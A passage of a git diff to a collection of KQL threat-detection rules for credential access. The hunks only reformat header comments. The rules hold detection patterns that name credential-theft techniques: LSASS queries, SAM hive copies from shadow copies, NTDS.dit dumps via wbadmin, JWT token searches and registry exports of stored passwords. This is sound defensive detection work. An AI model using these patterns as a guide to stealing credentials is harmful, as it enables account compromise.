"setspn.exe" or (ProcessVersionInfoFileDescription contains "Query or reset the computer" and ProcessVersionInfoFileDescription contains "SPN attribute")) \ No newline at end of file diff --git a/KQL/rules/Credential Access/potential_windows_defender_av_bypass_via_dump64_exe_rename.kql b/KQL/rules/Credential Access/potential_windows_defender_av_bypass_via_dump64_exe_rename.kql index 40610060..68f3da01 100644 --- a/KQL/rules/Credential Access/potential_windows_defender_av_bypass_via_dump64_exe_rename.kql +++ b/KQL/rules/Credential Access/potential_windows_defender_av_bypass_via_dump64_exe_rename.kql @@ -1,11 +1,11 @@ -// Title: Potential Windows Defender AV Bypass Via Dump64.EXE Rename -// Author: Austin Songer @austinsonger, Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems) -// Date: 2021-11-26 -// Level: high -// Description: Detects when a user is potentially trying to bypass the Windows Defender AV by renaming a tool to dump64.exe and placing it in the Visual Studio folder. -// Currently the rule is covering only usage of procdump but other utilities can be added in order to increase coverage. -// MITRE Tactic: Credential Access -// Tags: attack.credential-access, attack.t1003.001 - -DeviceProcessEvents +// Title: Potential Windows Defender AV Bypass Via Dump64.EXE Rename +// Author: Austin Songer @austinsonger, Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems) +// Date: 2021-11-26 +// Level: high +// Description: Detects when a user is potentially trying to bypass the Windows Defender AV by renaming a tool to dump64.exe and placing it in the Visual Studio folder. +// Currently the rule is covering only usage of procdump but other utilities can be added in order to increase coverage. +// MITRE Tactic: Credential Access +// Tags: attack.credential-access, attack.t1003.001 + +DeviceProcessEvents | where (FolderPath contains "\\Microsoft Visual Studio\\" and FolderPath endswith "\\dump64.exe" and FolderPath startswith ":\\Program Files") and (ProcessVersionInfoOriginalFileName =~ "procdump" or (ProcessCommandLine contains " -ma " or ProcessCommandLine contains " -mp ")) \ No newline at end of file diff --git a/KQL/rules/Credential Access/potentially_suspicious_command_targeting_teams_sensitive_files.kql b/KQL/rules/Credential Access/potentially_suspicious_command_targeting_teams_sensitive_files.kql index 785fe69a..c7a80863 100644 --- a/KQL/rules/Credential Access/potentially_suspicious_command_targeting_teams_sensitive_files.kql +++ b/KQL/rules/Credential Access/potentially_suspicious_command_targeting_teams_sensitive_files.kql @@ -1,11 +1,11 @@ -// Title: Potentially Suspicious Command Targeting Teams Sensitive Files -// Author: @SerkinValery -// Date: 2022-09-16 -// Level: medium -// Description: Detects a commandline containing references to the Microsoft Teams database or cookies files from a process other than Teams. -// The database might contain authentication tokens and other sensitive information about the logged in accounts. -// MITRE Tactic: Credential Access -// Tags: attack.credential-access, attack.t1528 - -DeviceProcessEvents +// Title: Potentially Suspicious Command Targeting Teams Sensitive Files +// Author: @SerkinValery +// Date: 2022-09-16 +// Level: medium +// Description: Detects a commandline containing references to the Microsoft Teams database or cookies files from a process other than Teams. +// The database might contain authentication tokens and other sensitive information about the logged in accounts. +// MITRE Tactic: Credential Access +// Tags: attack.credential-access, attack.t1528 + +DeviceProcessEvents | where (ProcessCommandLine contains "\\Microsoft\\Teams\\Cookies" or ProcessCommandLine contains "\\Microsoft\\Teams\\Local Storage\\leveldb") and (not(FolderPath endswith "\\Microsoft\\Teams\\current\\Teams.exe")) \ No newline at end of file diff --git a/KQL/rules/Credential Access/potentially_suspicious_eventlog_recon_activity_using_log_query_utilities.kql b/KQL/rules/Credential Access/potentially_suspicious_eventlog_recon_activity_using_log_query_utilities.kql index 2f1b5339..a0a3c7e4 100644 --- a/KQL/rules/Credential Access/potentially_suspicious_eventlog_recon_activity_using_log_query_utilities.kql +++ b/KQL/rules/Credential Access/potentially_suspicious_eventlog_recon_activity_using_log_query_utilities.kql @@ -1,13 +1,13 @@ -// Title: Potentially Suspicious EventLog Recon Activity Using Log Query Utilities -// Author: Nasreddine Bencherchali (Nextron Systems), X__Junior (Nextron Systems) -// Date: 2022-09-09 -// Level: medium -// Description: Detects execution of different log query utilities and commands to search and dump the content of specific event logs or look for specific event IDs. -// This technique is used by threat actors in order to extract sensitive information from events logs such as usernames, IP addresses, hostnames, etc. -// MITRE Tactic: Credential Access -// Tags: attack.credential-access, attack.discovery, attack.t1552 -// False Positives: -// - Legitimate usage of the utility by administrators to query the event log - -DeviceProcessEvents +// Title: Potentially Suspicious EventLog Recon Activity Using Log Query Utilities +// Author: Nasreddine Bencherchali (Nextron Systems), X__Junior (Nextron Systems) +// Date: 2022-09-09 +// Level: medium +// Description: Detects execution of different log query utilities and commands to search and dump the content of specific event logs or look for specific event IDs. +// This technique is used by threat actors in order to extract sensitive information from events logs such as usernames, IP addresses, hostnames, etc. +// MITRE Tactic: Credential Access +// Tags: attack.credential-access, attack.discovery, attack.t1552 +// False Positives: +// - Legitimate usage of the utility by administrators to query the event log + +DeviceProcessEvents | where (((ProcessCommandLine contains "-InstanceId 462") or (ProcessCommandLine contains ".eventid -eq 462") or (ProcessCommandLine contains "EventCode=" and ProcessCommandLine contains "462") or (ProcessCommandLine contains "EventIdentifier=" and ProcessCommandLine contains "462") or (ProcessCommandLine contains "System[EventID=462" and ProcessCommandLine contains "]") or ProcessCommandLine contains "-InstanceId 4778" or ProcessCommandLine contains ".eventid -eq 4778" or ProcessCommandLine contains "System[EventID=4778]" or (ProcessCommandLine contains "EventCode=" and ProcessCommandLine contains "4778") or (ProcessCommandLine contains "EventIdentifier=" and ProcessCommandLine contains "4778") or ProcessCommandLine contains "-InstanceId 25" or ProcessCommandLine contains ".eventid -eq 25" or ProcessCommandLine contains "System[EventID=25]" or (ProcessCommandLine contains "EventCode=" and ProcessCommandLine contains "25") or (ProcessCommandLine contains "EventIdentifier=" and ProcessCommandLine contains "25")) or (ProcessCommandLine contains "Microsoft-Windows-PowerShell" or ProcessCommandLine contains "Microsoft-Windows-Security-Auditing" or ProcessCommandLine contains "Microsoft-Windows-TerminalServices-LocalSessionManager" or ProcessCommandLine contains "Microsoft-Windows-TerminalServices-RemoteConnectionManager" or ProcessCommandLine contains "Microsoft-Windows-Windows Defender" or ProcessCommandLine contains "PowerShellCore" or ProcessCommandLine contains "Security" or ProcessCommandLine contains "Windows PowerShell")) and ((ProcessCommandLine contains "Select" and ProcessCommandLine contains "Win32_NTLogEvent") or ((ProcessCommandLine contains " qe " or ProcessCommandLine contains " query-events ") and (FolderPath endswith "\\wevtutil.exe" or ProcessVersionInfoOriginalFileName =~ "wevtutil.exe")) or (ProcessCommandLine contains " ntevent" and (FolderPath endswith "\\wmic.exe" or ProcessVersionInfoOriginalFileName =~ "wmic.exe")) or (ProcessCommandLine contains "Get-WinEvent " or ProcessCommandLine contains "get-eventlog ")) \ No newline at end of file diff --git a/KQL/rules/Credential Access/potentially_suspicious_jwt_token_search_via_cli.kql b/KQL/rules/Credential Access/potentially_suspicious_jwt_token_search_via_cli.kql index 5a664c76..c09efbd5 100644 --- a/KQL/rules/Credential Access/potentially_suspicious_jwt_token_search_via_cli.kql +++ b/KQL/rules/Credential Access/potentially_suspicious_jwt_token_search_via_cli.kql @@ -1,12 +1,12 @@ -// Title: Potentially Suspicious JWT Token Search Via CLI -// Author: Nasreddine Bencherchali (Nextron Systems), kagebunsher -// Date: 2022-10-25 -// Level: medium -// Description: Detects potentially suspicious search for JWT tokens via CLI by looking for the string "eyJ0eX" or "eyJhbG". -// JWT tokens are often used for access-tokens across various applications and services like Microsoft 365, Azure, AWS, Google Cloud, and others. -// Threat actors may search for these tokens to steal them for lateral movement or privilege escalation. -// MITRE Tactic: Credential Access -// Tags: attack.credential-access, attack.t1528, attack.t1552.001 - -DeviceProcessEvents +// Title: Potentially Suspicious JWT Token Search Via CLI +// Author: Nasreddine Bencherchali (Nextron Systems), kagebunsher +// Date: 2022-10-25 +// Level: medium +// Description: Detects potentially suspicious search for JWT tokens via CLI by looking for the string "eyJ0eX" or "eyJhbG". +// JWT tokens are often used for access-tokens across various applications and services like Microsoft 365, Azure, AWS, Google Cloud, and others. +// Threat actors may search for these tokens to steal them for lateral movement or privilege escalation. +// MITRE Tactic: Credential Access +// Tags: attack.credential-access, attack.t1528, attack.t1552.001 + +DeviceProcessEvents | where (ProcessCommandLine contains "eyJ0eXAiOi" or ProcessCommandLine contains "eyJhbGciOi" or ProcessCommandLine contains " eyJ0eX" or ProcessCommandLine contains " \"eyJ0eX\"" or ProcessCommandLine contains " 'eyJ0eX'" or ProcessCommandLine contains " eyJhbG" or ProcessCommandLine contains " \"eyJhbG\"" or ProcessCommandLine contains " 'eyJhbG'") and (ProcessCommandLine contains "find " or ProcessCommandLine contains "find.exe" or ProcessCommandLine contains "findstr" or ProcessCommandLine contains "select-string " or ProcessCommandLine contains "strings") \ No newline at end of file diff --git a/KQL/rules/Credential Access/potentially_suspicious_odbc_driver_registered.kql b/KQL/rules/Credential Access/potentially_suspicious_odbc_driver_registered.kql index aebafd8b..243c576f 100644 --- a/KQL/rules/Credential Access/potentially_suspicious_odbc_driver_registered.kql +++ b/KQL/rules/Credential Access/potentially_suspicious_odbc_driver_registered.kql @@ -1,12 +1,12 @@ -// Title: Potentially Suspicious ODBC Driver Registered -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023-05-23 -// Level: high -// Description: Detects the registration of a new ODBC driver where the driver is located in a potentially suspicious location -// MITRE Tactic: Credential Access -// Tags: attack.credential-access, attack.persistence, attack.t1003 -// False Positives: -// - Unlikely - -DeviceRegistryEvents +// Title: Potentially Suspicious ODBC Driver Registered +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-05-23 +// Level: high +// Description: Detects the registration of a new ODBC driver where the driver is located in a potentially suspicious location +// MITRE Tactic: Credential Access +// Tags: attack.credential-access, attack.persistence, attack.t1003 +// False Positives: +// - Unlikely + +DeviceRegistryEvents | where (RegistryValueData contains ":\\PerfLogs\\" or RegistryValueData contains ":\\ProgramData\\" or RegistryValueData contains ":\\Temp\\" or RegistryValueData contains ":\\Users\\Public\\" or RegistryValueData contains ":\\Windows\\Registration\\CRMLog" or RegistryValueData contains ":\\Windows\\System32\\com\\dmp\\" or RegistryValueData contains ":\\Windows\\System32\\FxsTmp\\" or RegistryValueData contains ":\\Windows\\System32\\Microsoft\\Crypto\\RSA\\MachineKeys\\" or RegistryValueData contains ":\\Windows\\System32\\spool\\drivers\\color\\" or RegistryValueData contains ":\\Windows\\System32\\spool\\PRINTERS\\" or RegistryValueData contains ":\\Windows\\System32\\spool\\SERVERS\\" or RegistryValueData contains ":\\Windows\\System32\\Tasks_Migrated\\" or RegistryValueData contains ":\\Windows\\System32\\Tasks\\Microsoft\\Windows\\SyncCenter\\" or RegistryValueData contains ":\\Windows\\SysWOW64\\com\\dmp\\" or RegistryValueData contains ":\\Windows\\SysWOW64\\FxsTmp\\" or RegistryValueData contains ":\\Windows\\SysWOW64\\Tasks\\Microsoft\\Windows\\PLA\\System\\" or RegistryValueData contains ":\\Windows\\SysWOW64\\Tasks\\Microsoft\\Windows\\SyncCenter\\" or RegistryValueData contains ":\\Windows\\Tasks\\" or RegistryValueData contains ":\\Windows\\Temp\\" or RegistryValueData contains ":\\Windows\\Tracing\\" or RegistryValueData contains "\\AppData\\Local\\Temp\\" or RegistryValueData contains "\\AppData\\Roaming\\") and RegistryKey endswith "\\SOFTWARE\\ODBC\\ODBCINST.INI*" and (RegistryKey endswith "\\Driver" or RegistryKey endswith "\\Setup") \ No newline at end of file diff --git a/KQL/rules/Credential Access/powershell_get_process_lsass.kql b/KQL/rules/Credential Access/powershell_get_process_lsass.kql index 75596c70..7350a45e 100644 --- a/KQL/rules/Credential Access/powershell_get_process_lsass.kql +++ b/KQL/rules/Credential Access/powershell_get_process_lsass.kql @@ -1,10 +1,10 @@ -// Title: PowerShell Get-Process LSASS -// Author: Florian Roth (Nextron Systems) -// Date: 2021-04-23 -// Level: high -// Description: Detects a "Get-Process" cmdlet and it's aliases on lsass process, which is in almost all cases a sign of malicious activity -// MITRE Tactic: Credential Access -// Tags: attack.credential-access, attack.t1552.004 - -DeviceProcessEvents +// Title: PowerShell Get-Process LSASS +// Author: Florian Roth (Nextron Systems) +// Date: 2021-04-23 +// Level: high +// Description: Detects a "Get-Process" cmdlet and it's aliases on lsass process, which is in almost all cases a sign of malicious activity +// MITRE Tactic: Credential Access +// Tags: attack.credential-access, attack.t1552.004 + +DeviceProcessEvents | where ProcessCommandLine contains "Get-Process lsas" or ProcessCommandLine contains "ps lsas" or ProcessCommandLine contains "gps lsas" \ No newline at end of file diff --git a/KQL/rules/Credential Access/powershell_sam_copy.kql b/KQL/rules/Credential Access/powershell_sam_copy.kql index 5400fcef..7852a2fb 100644 --- a/KQL/rules/Credential Access/powershell_sam_copy.kql +++ b/KQL/rules/Credential Access/powershell_sam_copy.kql @@ -1,13 +1,13 @@ -// Title: PowerShell SAM Copy -// Author: Florian Roth (Nextron Systems) -// Date: 2021-07-29 -// Level: high -// Description: Detects suspicious PowerShell scripts accessing SAM hives -// MITRE Tactic: Credential Access -// Tags: attack.credential-access, attack.t1003.002 -// False Positives: -// - Some rare backup scenarios -// - PowerShell scripts fixing HiveNightmare / SeriousSAM ACLs - -DeviceProcessEvents +// Title: PowerShell SAM Copy +// Author: Florian Roth (Nextron Systems) +// Date: 2021-07-29 +// Level: high +// Description: Detects suspicious PowerShell scripts accessing SAM hives +// MITRE Tactic: Credential Access +// Tags: attack.credential-access, attack.t1003.002 +// False Positives: +// - Some rare backup scenarios +// - PowerShell scripts fixing HiveNightmare / SeriousSAM ACLs + +DeviceProcessEvents | where (ProcessCommandLine contains "\\HarddiskVolumeShadowCopy" and ProcessCommandLine contains "System32\\config\\sam") and (ProcessCommandLine contains "Copy-Item" or ProcessCommandLine contains "cp $_." or ProcessCommandLine contains "cpi $_." or ProcessCommandLine contains "copy $_." or ProcessCommandLine contains ".File]::Copy(") \ No newline at end of file diff --git a/KQL/rules/Credential Access/private_keys_reconnaissance_via_commandline_tools.kql b/KQL/rules/Credential Access/private_keys_reconnaissance_via_commandline_tools.kql index f8744d66..661a302c 100644 --- a/KQL/rules/Credential Access/private_keys_reconnaissance_via_commandline_tools.kql +++ b/KQL/rules/Credential Access/private_keys_reconnaissance_via_commandline_tools.kql @@ -1,10 +1,10 @@ -// Title: Private Keys Reconnaissance Via CommandLine Tools -// Author: frack113, Nasreddine Bencherchali (Nextron Systems) -// Date: 2021-07-20 -// Level: medium -// Description: Adversaries may search for private key certificate files on compromised systems for insecurely stored credential -// MITRE Tactic: Credential Access -// Tags: attack.credential-access, attack.t1552.004 - -DeviceProcessEvents +// Title: Private Keys Reconnaissance Via CommandLine Tools +// Author: frack113, Nasreddine Bencherchali (Nextron Systems) +// Date: 2021-07-20 +// Level: medium +// Description: Adversaries may search for private key certificate files on compromised systems for insecurely stored credential +// MITRE Tactic: Credential Access +// Tags: attack.credential-access, attack.t1552.004 + +DeviceProcessEvents | where (ProcessCommandLine contains ".key" or ProcessCommandLine contains ".pgp" or ProcessCommandLine contains ".gpg" or ProcessCommandLine contains ".ppk" or ProcessCommandLine contains ".p12" or ProcessCommandLine contains ".pem" or ProcessCommandLine contains ".pfx" or ProcessCommandLine contains ".cer" or ProcessCommandLine contains ".p7b" or ProcessCommandLine contains ".asc") and ((ProcessCommandLine contains "dir " and (FolderPath endswith "\\cmd.exe" or ProcessVersionInfoOriginalFileName =~ "Cmd.Exe")) or (ProcessCommandLine contains "Get-ChildItem " and ((FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") or (ProcessVersionInfoOriginalFileName in~ ("PowerShell.EXE", "pwsh.dll")))) or (FolderPath endswith "\\findstr.exe" or ProcessVersionInfoOriginalFileName =~ "FINDSTR.EXE")) \ No newline at end of file diff --git a/KQL/rules/Credential Access/process_memory_dump_via_rdrleakdiag_exe.kql b/KQL/rules/Credential Access/process_memory_dump_via_rdrleakdiag_exe.kql index 5ae8bf20..bac09fa4 100644 --- a/KQL/rules/Credential Access/process_memory_dump_via_rdrleakdiag_exe.kql +++ b/KQL/rules/Credential Access/process_memory_dump_via_rdrleakdiag_exe.kql @@ -1,12 +1,12 @@ -// Title: Process Memory Dump via RdrLeakDiag.EXE -// Author: Cedric MAURUGEON, Florian Roth (Nextron Systems), Swachchhanda Shrawan Poudel, Nasreddine Bencherchali (Nextron Systems) -// Date: 2021-09-24 -// Level: high -// Description: Detects the use of the Microsoft Windows Resource Leak Diagnostic tool "rdrleakdiag.exe" to dump process memory -// MITRE Tactic: Credential Access -// Tags: attack.credential-access, attack.t1003.001 -// False Positives: -// - Unlikely - -DeviceProcessEvents +// Title: Process Memory Dump via RdrLeakDiag.EXE +// Author: Cedric MAURUGEON, Florian Roth (Nextron Systems), Swachchhanda Shrawan Poudel, Nasreddine Bencherchali (Nextron Systems) +// Date: 2021-09-24 +// Level: high +// Description: Detects the use of the Microsoft Windows Resource Leak Diagnostic tool "rdrleakdiag.exe" to dump process memory +// MITRE Tactic: Credential Access +// Tags: attack.credential-access, attack.t1003.001 +// False Positives: +// - Unlikely + +DeviceProcessEvents | where (ProcessCommandLine contains "-memdmp" or ProcessCommandLine contains "/memdmp" or ProcessCommandLine contains "–memdmp" or ProcessCommandLine contains "—memdmp" or ProcessCommandLine contains "―memdmp" or ProcessCommandLine contains "fullmemdmp") and (ProcessCommandLine contains " -o " or ProcessCommandLine contains " /o " or ProcessCommandLine contains " –o " or ProcessCommandLine contains " —o " or ProcessCommandLine contains " ―o " or ProcessCommandLine contains " -p " or ProcessCommandLine contains " /p " or ProcessCommandLine contains " –p " or ProcessCommandLine contains " —p " or ProcessCommandLine contains " ―p ") and (FolderPath endswith "\\rdrleakdiag.exe" or ProcessVersionInfoOriginalFileName =~ "RdrLeakDiag.exe") \ No newline at end of file diff --git a/KQL/rules/Credential Access/pua_dit_snapshot_viewer.kql b/KQL/rules/Credential Access/pua_dit_snapshot_viewer.kql index 04b58745..e721b309 100644 --- a/KQL/rules/Credential Access/pua_dit_snapshot_viewer.kql +++ b/KQL/rules/Credential Access/pua_dit_snapshot_viewer.kql @@ -1,12 +1,12 @@ -// Title: PUA - DIT Snapshot Viewer -// Author: Furkan Caliskan (@caliskanfurkan_) -// Date: 2020-07-04 -// Level: high -// Description: Detects the use of Ditsnap tool, an inspection tool for Active Directory database, ntds.dit. -// MITRE Tactic: Credential Access -// Tags: attack.credential-access, attack.t1003.003 -// False Positives: -// - Legitimate admin usage - -DeviceProcessEvents +// Title: PUA - DIT Snapshot Viewer +// Author: Furkan Caliskan (@caliskanfurkan_) +// Date: 2020-07-04 +// Level: high +// Description: Detects the use of Ditsnap tool, an inspection tool for Active Directory database, ntds.dit. +// MITRE Tactic: Credential Access +// Tags: attack.credential-access, attack.t1003.003 +// False Positives: +// - Legitimate admin usage + +DeviceProcessEvents | where FolderPath endswith "\\ditsnap.exe" or ProcessCommandLine contains "ditsnap.exe" \ No newline at end of file diff --git a/KQL/rules/Credential Access/pua_mouse_lock_execution.kql b/KQL/rules/Credential Access/pua_mouse_lock_execution.kql index a438a4e9..f0a29b3f 100644 --- a/KQL/rules/Credential Access/pua_mouse_lock_execution.kql +++ b/KQL/rules/Credential Access/pua_mouse_lock_execution.kql @@ -1,12 +1,12 @@ -// Title: PUA - Mouse Lock Execution -// Author: Cian Heasley -// Date: 2020-08-13 -// Level: medium -// Description: In Kaspersky's 2020 Incident Response Analyst Report they listed legitimate tool "Mouse Lock" as being used for both credential access and collection in security incidents. -// MITRE Tactic: Credential Access -// Tags: attack.credential-access, attack.collection, attack.t1056.002 -// False Positives: -// - Legitimate uses of Mouse Lock software - -DeviceProcessEvents +// Title: PUA - Mouse Lock Execution +// Author: Cian Heasley +// Date: 2020-08-13 +// Level: medium +// Description: In Kaspersky's 2020 Incident Response Analyst Report they listed legitimate tool "Mouse Lock" as being used for both credential access and collection in security incidents. +// MITRE Tactic: Credential Access +// Tags: attack.credential-access, attack.collection, attack.t1056.002 +// False Positives: +// - Legitimate uses of Mouse Lock software + +DeviceProcessEvents | where ProcessVersionInfoProductName contains "Mouse Lock" or ProcessVersionInfoCompanyName contains "Misc314" or ProcessCommandLine contains "Mouse Lock_" \ No newline at end of file diff --git a/KQL/rules/Credential Access/pua_webbrowserpassview_execution.kql b/KQL/rules/Credential Access/pua_webbrowserpassview_execution.kql index 8dfa441e..24861905 100644 --- a/KQL/rules/Credential Access/pua_webbrowserpassview_execution.kql +++ b/KQL/rules/Credential Access/pua_webbrowserpassview_execution.kql @@ -1,12 +1,12 @@ -// Title: PUA - WebBrowserPassView Execution -// Author: frack113 -// Date: 2022-08-20 -// Level: medium -// Description: Detects the execution of WebBrowserPassView.exe. A password recovery tool that reveals the passwords stored by the following Web browsers, Internet Explorer (Version 4.0 - 11.0), Mozilla Firefox (All Versions), Google Chrome, Safari, and Opera -// MITRE Tactic: Credential Access -// Tags: attack.credential-access, attack.t1555.003 -// False Positives: -// - Legitimate use - -DeviceProcessEvents +// Title: PUA - WebBrowserPassView Execution +// Author: frack113 +// Date: 2022-08-20 +// Level: medium +// Description: Detects the execution of WebBrowserPassView.exe. A password recovery tool that reveals the passwords stored by the following Web browsers, Internet Explorer (Version 4.0 - 11.0), Mozilla Firefox (All Versions), Google Chrome, Safari, and Opera +// MITRE Tactic: Credential Access +// Tags: attack.credential-access, attack.t1555.003 +// False Positives: +// - Legitimate use + +DeviceProcessEvents | where ProcessVersionInfoFileDescription =~ "Web Browser Password Viewer" or FolderPath endswith "\\WebBrowserPassView.exe" \ No newline at end of file diff --git a/KQL/rules/Credential Access/registry_export_of_third_party_credentials.kql b/KQL/rules/Credential Access/registry_export_of_third_party_credentials.kql index e4df5719..3d9c14fc 100644 --- a/KQL/rules/Credential Access/registry_export_of_third_party_credentials.kql +++ b/KQL/rules/Credential Access/registry_export_of_third_party_credentials.kql @@ -1,11 +1,11 @@ -// Title: Registry Export of Third-Party Credentials -// Author: Swachchhanda Shrawan Poudel (Nextron Systems) -// Date: 2025-05-22 -// Level: high -// Description: Detects the use of reg.exe to export registry paths associated with third-party credentials. -// Credential stealers have been known to use this technique to extract sensitive information from the registry. -// MITRE Tactic: Credential Access -// Tags: attack.credential-access, attack.t1552.002 - -DeviceProcessEvents +// Title: Registry Export of Third-Party Credentials +// Author: Swachchhanda Shrawan Poudel (Nextron Systems) +// Date: 2025-05-22 +// Level: high +// Description: Detects the use of reg.exe to export registry paths associated with third-party credentials. +// Credential stealers have been known to use this technique to extract sensitive information from the registry. +// MITRE Tactic: Credential Access +// Tags: attack.credential-access, attack.t1552.002 + +DeviceProcessEvents | where (ProcessCommandLine contains "\\Software\\Aerofox\\Foxmail\\V3.1" or ProcessCommandLine contains "\\Software\\Aerofox\\FoxmailPreview" or ProcessCommandLine contains "\\Software\\DownloadManager\\Passwords" or ProcessCommandLine contains "\\Software\\FTPWare\\COREFTP\\Sites" or ProcessCommandLine contains "\\Software\\IncrediMail\\Identities" or ProcessCommandLine contains "\\Software\\Martin Prikryl\\WinSCP 2\\Sessions" or ProcessCommandLine contains "\\Software\\Mobatek\\MobaXterm" or ProcessCommandLine contains "\\Software\\OpenSSH\\Agent\\Keys" or ProcessCommandLine contains "\\Software\\OpenVPN-GUI\\configs" or ProcessCommandLine contains "\\Software\\ORL\\WinVNC3\\Password" or ProcessCommandLine contains "\\Software\\Qualcomm\\Eudora\\CommandLine" or ProcessCommandLine contains "\\Software\\RealVNC\\WinVNC4" or ProcessCommandLine contains "\\Software\\RimArts\\B2\\Settings" or ProcessCommandLine contains "\\Software\\SimonTatham\\PuTTY\\Sessions" or ProcessCommandLine contains "\\Software\\SimonTatham\\PuTTY\\SshHostKeys" or ProcessCommandLine contains "\\Software\\Sota\\FFFTP" or ProcessCommandLine contains "\\Software\\TightVNC\\Server" or ProcessCommandLine contains "\\Software\\WOW6432Node\\Radmin\\v3.0\\Server\\Parameters\\Radmin") and (ProcessCommandLine contains "save" or ProcessCommandLine contains "export") and (FolderPath endswith "\\reg.exe" or ProcessVersionInfoOriginalFileName =~ "reg.exe") \ No newline at end of file diff --git a/KQL/rules/Credential Access/renamed_browsercore_exe_execution.kql b/KQL/rules/Credential Access/renamed_browsercore_exe_execution.kql index ef376f0c..1f2cc434 100644 --- a/KQL/rules/Credential Access/renamed_browsercore_exe_execution.kql +++ b/KQL/rules/Credential Access/renamed_browsercore_exe_execution.kql @@ -1,10 +1,10 @@ -// Title: Renamed BrowserCore.EXE Execution -// Author: Max Altgelt (Nextron Systems) -// Date: 2022-06-02 -// Level: high -// Description: Detects process creation with a renamed BrowserCore.exe (used to extract Azure tokens) -// MITRE Tactic: Credential Access -// Tags: attack.credential-access, attack.defense-evasion, attack.t1528, attack.t1036.003 - -DeviceProcessEvents +// Title: Renamed BrowserCore.EXE Execution +// Author: Max Altgelt (Nextron Systems) +// Date: 2022-06-02 +// Level: high +// Description: Detects process creation with a renamed BrowserCore.exe (used to extract Azure tokens) +// MITRE Tactic: Credential Access +// Tags: attack.credential-access, attack.defense-evasion, attack.t1528, attack.t1036.003 + +DeviceProcessEvents | where ProcessVersionInfoOriginalFileName =~ "BrowserCore.exe" and (not(FolderPath endswith "\\BrowserCore.exe")) \ No newline at end of file diff --git a/KQL/rules/Credential Access/sensitive_file_dump_via_wbadmin_exe.kql b/KQL/rules/Credential Access/sensitive_file_dump_via_wbadmin_exe.kql index 46c9bc5e..da17967d 100644 --- a/KQL/rules/Credential Access/sensitive_file_dump_via_wbadmin_exe.kql +++ b/KQL/rules/Credential Access/sensitive_file_dump_via_wbadmin_exe.kql @@ -1,13 +1,13 @@ -// Title: Sensitive File Dump Via Wbadmin.EXE -// Author: Nasreddine Bencherchali (Nextron Systems), frack113 -// Date: 2024-05-10 -// Level: high -// Description: Detects the dump of highly sensitive files such as "NTDS.DIT" and "SECURITY" hive. -// Attackers can leverage the "wbadmin" utility in order to dump sensitive files that might contain credential or sensitive information. -// MITRE Tactic: Credential Access -// Tags: attack.credential-access, attack.t1003.003 -// False Positives: -// - Legitimate backup operation by authorized administrators. Matches must be investigated and allowed on a case by case basis. - -DeviceProcessEvents +// Title: Sensitive File Dump Via Wbadmin.EXE +// Author: Nasreddine Bencherchali (Nextron Systems), frack113 +// Date: 2024-05-10 +// Level: high +// Description: Detects the dump of highly sensitive files such as "NTDS.DIT" and "SECURITY" hive. +// Attackers can leverage the "wbadmin" utility in order to dump sensitive files that might contain credential or sensitive information. +// MITRE Tactic: Credential Access +// Tags: attack.credential-access, attack.t1003.003 +// False Positives: +// - Legitimate backup operation by authorized administrators. Matches must be investigated and allowed on a case by case basis. + +DeviceProcessEvents | where (ProcessCommandLine contains "start" or ProcessCommandLine contains "backup") and (FolderPath endswith "\\wbadmin.exe" or ProcessVersionInfoOriginalFileName =~ "WBADMIN.EXE") and (ProcessCommandLine contains "\\config\\SAM" or ProcessCommandLine contains "\\config\\SECURITY" or ProcessCommandLine contains "\\config\\SYSTEM" or ProcessCommandLine contains "\\Windows\\NTDS\\NTDS.dit") \ No newline at end of file diff --git a/KQL/rules/Credential Access/sensitive_file_recovery_from_backup_via_wbadmin_exe.kql b/KQL/rules/Credential Access/sensitive_file_recovery_from_backup_via_wbadmin_exe.kql index 484f1b7d..61a5e691 100644 --- a/KQL/rules/Credential Access/sensitive_file_recovery_from_backup_via_wbadmin_exe.kql +++ b/KQL/rules/Credential Access/sensitive_file_recovery_from_backup_via_wbadmin_exe.kql @@ -1,11 +1,11 @@ -// Title: Sensitive File Recovery From Backup Via Wbadmin.EXE -// Author: Nasreddine Bencherchali (Nextron Systems), frack113 -// Date: 2024-05-10 -// Level: high -// Description: Detects the dump of highly sensitive files such as "NTDS.DIT" and "SECURITY" hive. -// Attackers can leverage the "wbadmin" utility in order to dump sensitive files that might contain credential or sensitive information. -// MITRE Tactic: Credential Access -// Tags: attack.credential-access, attack.t1003.003 - -DeviceProcessEvents +// Title: Sensitive File Recovery From Backup Via Wbadmin.EXE +// Author: Nasreddine Bencherchali (Nextron Systems), frack113 +// Date: 2024-05-10 +// Level: high +// Description: Detects the dump of highly sensitive files such as "NTDS.DIT" and "SECURITY" hive. +// Attackers can leverage the "wbadmin" utility in order to dump sensitive files that might contain credential or sensitive information. +// MITRE Tactic: Credential Access +// Tags: attack.credential-access, attack.t1003.003 + +DeviceProcessEvents | where ((ProcessCommandLine contains "\\config\\SAM" or ProcessCommandLine contains "\\config\\SECURITY" or ProcessCommandLine contains "\\config\\SYSTEM" or ProcessCommandLine contains "\\Windows\\NTDS\\NTDS.dit") and (ProcessCommandLine contains " recovery" and ProcessCommandLine contains "recoveryTarget" and ProcessCommandLine contains "itemtype:File")) and (FolderPath endswith "\\wbadmin.exe" or ProcessVersionInfoOriginalFileName =~ "WBADMIN.EXE") \ No newline at end of file diff --git a/KQL/rules/Credential Access/shadow_copies_creation_using_operating_systems_utilities.kql b/KQL/rules/Credential Access/shadow_copies_creation_using_operating_systems_utilities.kql index 8013e5e0..44af7700 100644 --- a/KQL/rules/Credential Access/shadow_copies_creation_using_operating_systems_utilities.kql +++ b/KQL/rules/Credential Access/shadow_copies_creation_using_operating_systems_utilities.kql @@ -1,12 +1,12 @@ -// Title: Shadow Copies Creation Using Operating Systems Utilities -// Author: Teymur Kheirkhabarov, Daniil Yugoslavskiy, oscd.community -// Date: 2019-10-22 -// Level: medium -// Description: Shadow Copies creation using operating systems utilities, possible credential access -// MITRE Tactic: Credential Access -// Tags: attack.credential-access, attack.t1003, attack.t1003.002, attack.t1003.003 -// False Positives: -// - Legitimate administrator working with shadow copies, access for backup purposes - -DeviceProcessEvents +// Title: Shadow Copies Creation Using Operating Systems Utilities +// Author: Teymur Kheirkhabarov, Daniil Yugoslavskiy, oscd.community +// Date: 2019-10-22 +// Level: medium +// Description: Shadow Copies creation using operating systems utilities, possible credential access +// MITRE Tactic: Credential Access +// Tags: attack.credential-access, attack.t1003, attack.t1003.002, attack.t1003.003 